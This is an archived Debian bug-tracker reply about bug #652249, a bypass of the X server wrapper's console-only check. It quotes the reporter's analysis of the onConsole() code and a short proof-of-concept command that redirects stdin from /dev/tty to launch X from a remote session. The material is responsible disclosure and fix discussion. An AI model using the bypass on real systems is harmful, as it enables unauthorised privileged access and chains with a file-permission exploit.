Bug#652249: bypass default security level of the X wrapper

To: vladz <vladz@devzero.fr>, 652249@bugs.debian.org
Subject: Bug#652249: bypass default security level of the X wrapper
From: Julien Cristau <jcristau@debian.org>
Date: Thu, 15 Dec 2011 19:39:16 +0100
Message-id: <[🔎] 20111215183916.GA15525@radis.cristau.org>
Reply-to: Julien Cristau <jcristau@debian.org>, 652249@bugs.debian.org
In-reply-to: <[🔎] 20111215180236.GA32390@devzero.fr>
References: <[🔎] 20111215180236.GA32390@devzero.fr>

On Thu, Dec 15, 2011 at 19:02:36 +0100, vladz wrote:

> 
> Package: xserver-xorg
> Version: 1:7.5+8
> Severity: important
> Tags: security
> 
> 
> By default, the wrapper's configuration file only allows any user whose
> controlling TTY (console) to start the X server with root privileges: 
> 
>   # cat /etc/X11/Xwrapper.config
>   [...]
>   allowed_users=console
> 
> To determine if a user is controlling a TTY, the code checks the
> properties of the file connected to its standard input:
> 
>   $ cat -n debian/local/xserver-wrapper.c
>   [...]
>   152 static int
>   153 onConsole()
>   154 {
>   155 #if defined(__linux__)
>   156   struct stat s;
>   157
>   158   /* see if stdin is a virtual console device */
>   159   if (fstat(0, &s) != 0) {
>   160     (void) fprintf(stderr, "X: cannot stat stdin\n");
>   161     return FALSE;
>   162   }
>   163   if (S_ISCHR(s.st_mode) &&
>   164         ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV &&
>   165           (s.st_rdev & 0xff) < 64) ||
>   166         (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV &&
>   167           (s.st_rdev & 0xff) < 64)
>   168         )) {
>   169     return TRUE;
>   170   }
> 
> As seen, this is done by checking if this file:
> 
>   - is a character device [line 163]
>   - has a TTY-specific major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV,
>     respectively 4 or 5) [lines 164, 166]
>   - has a minor number lower than 64 [lines 165, 167]
> 
> Unfortunately, by connecting a file with similar properties to its
> stdin, a user can mislead the X wrapper and launch the X server.  This
> file also needs to be readable by the user.
> 
> For instance, files "/dev/tty" and "/dev/ptmx" match those conditions:
> 
>   $ ls -l /dev/tty /dev/ptmx
>   crw-rw-rw- 1 root root 5, 2 14 déc.  18:43 /dev/ptmx
>   crw-rw-rw- 1 root root 5, 0 12 déc.  23:03 /dev/tty
> 
> Here is a quick PoC by using "/dev/tty":
> 
>   $ ssh remote_host
>   $ id
>   uid=1000(vladz) gid=1000(vladz) groups=1000(vladz)
>   $ tty
>   /dev/pts/4   // not a TTY, won't have sufficient permissions to start X
>   $ X :1
>   X: user not authorized to run the X server, aborting.
> 
>   // This was the expected result, now lets connect "/dev/tty" to stdin and
>   // retry...
> 
>   $ exec 0</dev/tty; X :1; exec 0</dev/pts/4
>   [... Xorg starts ...]    // start succeed!
> 
> This being said, this is a minor issue, but the attack against
> CVE-2011-4029[1] which allows to set the read permission on any arbitrary
> file, can now be launched from remote sessions and not even from a TTY.  It
> become urgent to fix it.
> 
Seems like we should revert the change accepting major 5 for stdin?

Cheers,
Julien

Reply to:

References:
- Bug#652249: bypass default security level of the X wrapper
  - From: vladz <vladz@devzero.fr>

Prev by Date: Bug#652249: bypass default security level of the X wrapper
Next by Date: xorg: Changes to 'debian-unstable'
Previous by thread: Bug#652249: bypass default security level of the X wrapper
Next by thread: Bug#652249: marked as done (bypass default security level of the X wrapper)
Index(es):
- Date
- Thread